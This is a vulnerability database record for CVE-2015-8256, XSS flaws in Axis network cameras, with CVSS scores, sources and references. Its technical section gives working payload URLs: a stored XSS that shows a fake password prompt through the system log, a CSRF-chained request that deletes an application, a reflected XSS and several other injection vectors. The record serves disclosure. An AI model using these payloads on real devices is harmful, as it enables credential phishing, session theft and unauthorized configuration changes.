ID

VAR-201704-0284


CVE

CVE-2015-8256


TITLE

AXIS Network camera cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-007530

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML.

I. Technical details
-----------------

** STORED XSS

# 1 Attacker injects a JavaScript payload in the vulnerable page (using some social engineering approach):

http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>

This will generate an error like this on the page:

"
Error processing XML: Incorrect formatting
line number 2, column 60:
<error type = "No_such_application" message = "No application" '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>'
----------------------------------------------------------------^
"

and will also create an entry in the general log file (/var/log/messages) with the JSPayload:

"
<INFO > Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find application '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>'
"

When the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports':

http://{axishost}/axis-cgi/admin/systemlog.cgi?id

the JSPayload will be interpreted by the browser and the JavaScript prompt method will be executed, showing a prompt asking the user for the password ('AXIS_PASSWORD').

* With this vector an attacker is able to perform many attacks using JavaScript, for example to hook the user's browser, capture the user's cookie, perform phishing attacks, etc. However, due to the CSRF presented, it is even possible to perform all actions already presented: create, edit and remove users and applications, etc.

For example, to delete an application "axis_update" via SXSS:

http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>

A reflected cross-site scripting affects all models of AXIS devices on the same parameter:

http://{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--

# Other Vectors

http://{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs" onerror=alert(7) /><!--
http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script>
http://{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>

# SCRIPTPATHS:

{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml

Impact
------
Allows running arbitrary code on a victim's browser and computer if combined with other flaws in the same devices.

Solution
--------
No solution to the problem was provided.

Credits
-------
The vulnerability has been discovered by SmithW from OrwellLabs

Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

About Orwelllabs
++++++++++++++++
doublethinking..

Trust: 2.07

sources: NVD: CVE-2015-8256 // JVNDB: JVNDB-2015-007530 // BID: 97699 // VULHUB: VHN-86217 // PACKETSTORM: 141674

AFFECTED PRODUCTS

vendor: axis, model: network camera, scope: eq, version: -

Trust: 1.6

vendor: axis, model: network camera, scope: -, version: -

Trust: 0.8

vendor: axis, model: communications network cameras, scope: eq, version: 0

Trust: 0.3

sources: BID: 97699 // JVNDB: JVNDB-2015-007530 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

CVSS

SEVERITY

nvd@nist.gov: CVE-2015-8256
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8256
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201704-863
value: MEDIUM

Trust: 0.6

VULHUB: VHN-86217
value: MEDIUM

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2015-8256
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-86217
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

CVSSV3

nvd@nist.gov: CVE-2015-8256
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-86217 // JVNDB: JVNDB-2015-007530 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

PROBLEMTYPE DATA

problemtype: CWE-79

Trust: 1.1

sources: VULHUB: VHN-86217 // NVD: CVE-2015-8256

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201704-863

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 141674 // CNNVD: CNNVD-201704-863

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007530

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-86217

PATCH

title: Network Camera, url: https://www.axis.com/ja/techsup/cam_servers/index.htm

Trust: 0.8

sources: JVNDB: JVNDB-2015-007530

EXTERNAL IDS

db: NVD, id: CVE-2015-8256

Trust: 2.9

db: PACKETSTORM, id: 141674

Trust: 2.6

db: EXPLOIT-DB, id: 39683

Trust: 1.7

db: BID, id: 97699

Trust: 1.4

db: JVNDB, id: JVNDB-2015-007530

Trust: 0.8

db: CNNVD, id: CNNVD-201704-863

Trust: 0.7

db: SEEBUG, id: SSVID-91665

Trust: 0.1

db: VULHUB, id: VHN-86217

Trust: 0.1

sources: VULHUB: VHN-86217 // BID: 97699 // JVNDB: JVNDB-2015-007530 // PACKETSTORM: 141674 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

REFERENCES

url:http://packetstormsecurity.com/files/141674/axis-network-camera-cross-site-scripting.html

Trust: 2.5

url:https://www.exploit-db.com/exploits/39683/

Trust: 1.7

url:http://www.securityfocus.com/bid/97699

Trust: 1.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-8256

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8256

Trust: 0.8

url:https://www.axis.com/in/en/

Trust: 0.3

url:http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script>

Trust: 0.1

url:http://{axishost}/axis-cgi/admin/systemlog.cgi?id

Trust: 0.1

url:http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script

Trust: 0.1

url:http://{axishost}/view/custom_whitebalance.shtml?imagepath=<img

Trust: 0.1

sources: VULHUB: VHN-86217 // BID: 97699 // JVNDB: JVNDB-2015-007530 // PACKETSTORM: 141674 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

CREDITS

SmithW from OrwellLabs

Trust: 0.3

sources: BID: 97699

SOURCES

db: VULHUB, id: VHN-86217
db: BID, id: 97699
db: JVNDB, id: JVNDB-2015-007530
db: PACKETSTORM, id: 141674
db: CNNVD, id: CNNVD-201704-863
db: NVD, id: CVE-2015-8256

LAST UPDATE DATE

2025-04-20T23:29:43.640000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-86217, date: 2017-04-25T00:00:00
db: BID, id: 97699, date: 2017-04-18T00:07:00
db: JVNDB, id: JVNDB-2015-007530, date: 2017-05-19T00:00:00
db: CNNVD, id: CNNVD-201704-863, date: 2017-04-25T00:00:00
db: NVD, id: CVE-2015-8256, date: 2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db: VULHUB, id: VHN-86217, date: 2017-04-17T00:00:00
db: BID, id: 97699, date: 2017-04-17T00:00:00
db: JVNDB, id: JVNDB-2015-007530, date: 2017-05-19T00:00:00
db: PACKETSTORM, id: 141674, date: 2017-03-17T00:08:43
db: CNNVD, id: CNNVD-201704-863, date: 2017-04-25T00:00:00
db: NVD, id: CVE-2015-8256, date: 2017-04-17T16:59:00.150